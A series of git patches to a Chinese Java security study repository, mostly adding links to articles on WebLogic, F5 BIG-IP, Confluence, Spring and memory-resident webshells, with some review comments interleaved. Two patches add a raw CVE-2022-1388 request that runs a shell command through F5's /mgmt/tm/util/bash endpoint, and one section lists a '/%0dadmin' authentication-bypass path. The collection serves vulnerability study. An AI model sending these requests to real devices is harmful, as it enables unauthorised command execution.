->http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/ -> ->https://y4er.com/post/weblogic-jrmp/ -> ->http://drops.xmd5.com/static/drops/web-13470.html -> ->https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704 -> ->http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html From 6e45fb7201296ab6719a5bc27d6b3171ea2afe50 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 20:28:00 +0800 Subject: [PATCH 043/332] Update Readme.md --- "java\345\233\236\346\230\276/Readme.md" | 6 ++++++ 1 file changed, 6 insertions(+) diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" index 27e1a87..6b74f01 100644 --- "a/java\345\233\236\346\230\276/Readme.md" +++ "b/java\345\233\236\346\230\276/Readme.md" 
@@ -1,5 +1,11 @@ # java回显 +**2022/5/2更新,发现fnmsd师傅弄跟dsf的回显感觉很np** +``` +https://blog.csdn.net/fnmsd/article/details/106709736 +https://blog.csdn.net/fnmsd/article/details/106890242 +``` + 发现个好项目 https://github.com/feihong-cs/Java-Rce-Echo >一般web服务是想办法获得response对象,可以参考[2021RCTF ezshell](https://github.com/Firebasky/ctf-Challenge/tree/main/RCTF-2021-EZshell) From 1e1da329ae1a35dc4fc1dc081df5d1527a1ed404 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 20:34:52 +0800 Subject: [PATCH 044/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 965e6a5..7e6da48 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -121,3 +121,4 @@ + 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** + 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** + 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** ++ 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) From 26eddc19b5d8ee46fe9d03e3204672f6a9a88ddd Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 20:37:34 +0800 Subject: [PATCH 045/332] Update README.md --- README.md | 16 ++++------------ 1 file changed, 4 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index c8f82b9..7a7d092 100644 --- a/README.md 
+++ b/README.md @@ -28,20 +28,12 @@ ## 代学习 [java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) :heavy_check_mark: -[jvm学习]() +[jvm学习]() 正在学习中. +## 说明 +目前该项目更新可能会慢一些,更新的基本上是在[添加了Java日常知识点](java日常)中记录自己感觉有意思的文章和小trick,希望对你有帮助. - -## 小记录 -2021/12/21更新 - -项目100star啦~~~~~~~~ - -------------------------------- - -2022/1/20更新 - -项目200star啦~~~~~~~~ +如果你遇到了很好的文章非常欢迎提交issues. ## Stargazers over time From e5e22f3e6e62e063c561366979009f7f968b928c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 3 May 2022 14:56:36 +0800 Subject: [PATCH 046/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7e6da48..2138a2b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -122,3 +122,4 @@ + 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** + 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** + 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) ++ 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** From cf9b74f751e4ed1834640d660cbff6a76373210b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 3 May 2022 15:15:24 +0800 Subject: [PATCH 047/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2138a2b..b5460ad 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -123,3 +123,4 @@ + 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** + 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) + 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** ++ 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** From 65919c894f60b4029ecb3ce30a0e8765c4ba988d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 4 May 2022 15:51:25 +0800 Subject: [PATCH 048/332] Create Readme.md --- F5 big/Readme.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 F5 big/Readme.md diff --git a/F5 big/Readme.md b/F5 big/Readme.md new file mode 100644 index 0000000..21d29e5 --- /dev/null +++ b/F5 big/Readme.md @@ -0,0 +1,14 @@ +# F5 big + +F5 Networks K52145254:TMUI RCE 漏洞 CVE-2020-5902 ++ [HSQLDB反序列化](https://buaq.net/go-84779.html) + + +F5 BIGIP iControl REST CVE-2021-22986 ++ [脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用](https://mp.weixin.qq.com/s/cavKq04hNU5pJoTBiPMZkw) ++ [F5 BIGIP iControl REST CVE-2021-22986漏洞分析与利用](https://www.anquanke.com/post/id/236159) ++ [F5 BIG-IP Cookie 信息泄露利用工具](https://mp.weixin.qq.com/s/RzYSA1ADrIQYQxqjug62sg) ++ [漏洞复现-F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)](https://mp.weixin.qq.com/s/CDST3_FcVM8tvB0hTlrsJg) + + + From f7f519c04fddcb71f5d245d34cf0334e235df8a4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 4 May 2022 21:21:10 +0800 Subject: [PATCH 049/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 4 ++++ 1 file changed, 4 insertions(+) 
diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index b44acd1..4859d8a 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -16,6 +16,10 @@ ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) ++ [JavaWeb 内存马二周目通关攻略](https://tttang.com/archive/1313) + +## jsp ++ [](https://xz.aliyun.com/t/10372) ## 查杀 + [查杀Java web filter型内存马](https://gv7.me/articles/2020/kill-java-web-filter-memshell/) From 0d5b6e66b3b1e3ec05041ce387455555fab5ee73 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 7 May 2022 23:12:09 +0800 Subject: [PATCH 050/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b5460ad..041e464 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -124,3 +124,4 @@ + 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) + 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** + 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** ++ 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** From 5eb78252a69eeb099d36119c2db51a8cfde29ee0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 20:16:06 +0800 Subject: [PATCH 051/332] Update Readme.md --- F5 big/Readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 21d29e5..a9a455d 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md 
@@ -10,5 +10,5 @@ F5 BIGIP iControl REST CVE-2021-22986 + [F5 BIG-IP Cookie 信息泄露利用工具](https://mp.weixin.qq.com/s/RzYSA1ADrIQYQxqjug62sg) + [漏洞复现-F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)](https://mp.weixin.qq.com/s/CDST3_FcVM8tvB0hTlrsJg) - - +CVE-2022-1388 ++ [BIG-IP(CVE-2022-1388)从修复方案分析出exp](https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q) From d23d9811d90b6de1afc144ea3475ddf72d7f87a6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 20:16:35 +0800 Subject: [PATCH 052/332] Update Readme.md --- F5 big/Readme.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index a9a455d..5c528d3 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -12,3 +12,15 @@ F5 BIGIP iControl REST CVE-2021-22986 CVE-2022-1388 + [BIG-IP(CVE-2022-1388)从修复方案分析出exp](https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q) +``` +POST /mgmt/tm/util/bash HTTP/1.1 +Host: +Connection: keep-alive, X-F5-Auth-Token +Authorization: Basic YWRtaW46 +Content-Length: 45 + +{ +"command":"run", +"utilCmdArgs":"-c id" +} +``` From 010f623a3eb1aaf5bf1cf63f0e8539d211a9e77b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 20:17:24 +0800 Subject: [PATCH 053/332] Update Readme.md --- F5 big/Readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 5c528d3..28fbf8d 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -16,7 +16,7 @@ CVE-2022-1388 POST /mgmt/tm/util/bash HTTP/1.1 Host: Connection: keep-alive, X-F5-Auth-Token -Authorization: Basic YWRtaW46 +Authorization: Basic YWRtaW46QVNhc1M= Content-Length: 45 { From 92235a922a1209ec354a5ca45bdb6fc6b68a85b1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 23:11:49 +0800 Subject: [PATCH 054/332] Update Readme.md --- F5 big/Readme.md | 1 + 1 file changed, 1 insertion(+) 
diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 28fbf8d..5550bdd 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -24,3 +24,4 @@ Content-Length: 45 "utilCmdArgs":"-c id" } ``` ++ [CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现](https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw) From 4fdc736ef98eac0af86dc569a1da7e4518348844 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:44:29 +0800 Subject: [PATCH 055/332] Create Readme.md --- .../Velocity/Readme.md" | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" new file mode 100644 index 0000000..c77b206 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -0,0 +1,5 @@ +# 真实例子 + +Confluence CVE-2019-3396 + +Confluence CVE-2021-26084 From 75ceceb52b876ef68c44078d01a7862171a3483c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:47:17 +0800 Subject: [PATCH 056/332] Create Readme.md --- Confluence/Readme.md | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 Confluence/Readme.md diff --git a/Confluence/Readme.md b/Confluence/Readme.md new file mode 100644 index 0000000..87dcd80 --- /dev/null +++ b/Confluence/Readme.md @@ -0,0 +1,8 @@ +# Confluence + +目前存在2个漏洞CVE-2019-3396,CVE-2021-26084 +项目中遇到了这个漏洞,并没有深入分析和利用。 +参考exp + ++ [CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) ++ [CVE-2021-26084](https://github.com/h3v0x/CVE-2021-26084_Confluence) From 1d77a594482b1b409032e0029593c96160ae1565 Mon Sep 17 00:00:00 2001 
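Review bot: in PATCH 045 (README.md), the changed line `+[jvm学习]() 正在学习中.` keeps an empty link target, so it renders as a link that goes nowhere. Either point it at the notes it refers to or make it plain text until they exist. The context heading `## 代学习` also looks like a typo for `## 待学习`, and it would be worth fixing while this section is being edited.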
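Review bot: in PATCH 049 (java内存马/Readme.md), the only entry under the new `## jsp` heading is `+ [](https://xz.aliyun.com/t/10372)`, whose link text is empty, so the list item renders as a blank bullet. Give it the article title like the other entries. Also, the added `JavaWeb 内存马二周目通关攻略` link lands under `## 后门`; check that this is the intended section.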
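Review bot: in PATCH 050 (java日常/Readme.md), the added 2022/05/07 entry repeats the title and URL (`https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg`) of the 2022/04/20 entry that is already in the list, visible as context in the earlier hunks of this file. Merge the new remark (`检测路径非常不错`) into the existing entry instead of listing the article twice.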
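Review bot: in PATCH 052 and 053 (F5 big/Readme.md), the fenced request under CVE-2022-1388 is added with no explanatory text, and PATCH 053 then changes the `Authorization: Basic` value with nothing in the commit message or README to say why. A reader cannot tell which part of the request the issue depends on or what the fix checks. Add a sentence above the block stating what it illustrates, note the affected and fixed versions from the vendor advisory, and mark the credential value as a placeholder if that is what it is.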
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:52:43 +0800 Subject: [PATCH 057/332] Update Readme.md --- Confluence/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Confluence/Readme.md b/Confluence/Readme.md index 87dcd80..70a6a80 100644 --- a/Confluence/Readme.md +++ b/Confluence/Readme.md @@ -6,3 +6,6 @@ + [CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) + [CVE-2021-26084](https://github.com/h3v0x/CVE-2021-26084_Confluence) + +## 漏洞分析 ++ [Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析](https://xz.aliyun.com/t/10736) From 08099ae46c7e6710a49037b96c08b7323d1cf772 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:54:44 +0800 Subject: [PATCH 058/332] Update Readme.md --- .../Velocity/Readme.md" | 1 - 1 file changed, 1 deletion(-) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index c77b206..3a3feb9 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -2,4 +2,3 @@ Confluence CVE-2019-3396 -Confluence CVE-2021-26084 From 5c0d1081e7538e33fee10f655973d7c10071bcdc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 14 May 2022 19:55:27 +0800 Subject: [PATCH 059/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 041e464..e062887 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -125,3 +125,4 @@ + 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** + 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** + 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** ++ 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** From 88a90f1c3c30a915feb869b178c02718b062a060 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 16 May 2022 00:34:11 +0800 Subject: [PATCH 060/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e062887..6bbdd03 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -126,3 +126,4 @@ + 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** + 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** + 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** ++ 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** From 6e3c8e51080dae1402b3e0a181e829aa52a8e128 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 16 May 2022 00:49:06 +0800 Subject: [PATCH 061/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6bbdd03..dc7fbed 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -127,3 +127,4 @@ + 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** + 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** + 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** ++ 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) From f613568b3637ea88856b5bf0158c81bc8cdb46ba Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 May 2022 20:28:11 +0800 Subject: [PATCH 062/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dc7fbed..373d202 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -128,3 +128,4 @@ + 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** + 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** + 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) ++ 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) From 46f6a935e3fb2481d01640da69c6a0b7cdbdb309 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 May 2022 21:52:58 +0800 Subject: [PATCH 063/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 373d202..1b8b565 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -129,3 +129,4 @@ + 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** + 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) + 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) ++ 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** From e2d9166cd71d9b936d2ed713e5f9cf2484ccc5d5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 20 May 2022 01:18:39 +0800 Subject: [PATCH 064/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1b8b565..48c1f4f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -130,3 +130,4 @@ + 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) + 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) + 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** ++ 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** From 9b885e384157176d80ba8982492dc6f0c8767e29 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 21 May 2022 20:54:28 +0800 Subject: [PATCH 065/332] Update Readme.md --- Spring/Readme.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Spring/Readme.md b/Spring/Readme.md index 0129415..d48eb5c 100644 --- a/Spring/Readme.md 
+++ b/Spring/Readme.md @@ -11,3 +11,12 @@ ``` /%0dadmin ``` + ++ [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过漏洞与利用场景分析](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490023&idx=1&sn=f7e654f69ceca1ff437d9431bdd8ffa7&chksm=cefda0f3f98a29e5556a31b28ba231613e49b0ff40fcee651fac351adc6376e2ad2b72509dbf&mpshare=1&scene=23&srcid=0521LQrB49HRCgrnaPZOD2ys&sharer_sharetime=1653110684149&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + +原理就是默认情况下, 正则表达式中点(.)不会匹配换行符, 设置了Pattern.DOTALL模式, 才会匹配所有字符包括换行符。从而绕过 + +![image](https://user-images.githubusercontent.com/63966847/169652431-125a8ebd-251d-4fec-a8dd-be20a3c60da5.png) + + +小知识:[Java中正则表达式(regex)匹配多行(Pattern.MULTILINE和Pattern.DOTALL模式)](https://www.cjavapy.com/article/68/) From a54440dcb43b3c1620634fd69a9e0e092e748160 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 May 2022 11:59:45 +0800 Subject: [PATCH 066/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 48c1f4f..4ccb632 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -131,3 +131,4 @@ + 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) + 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** + 2022/05/20 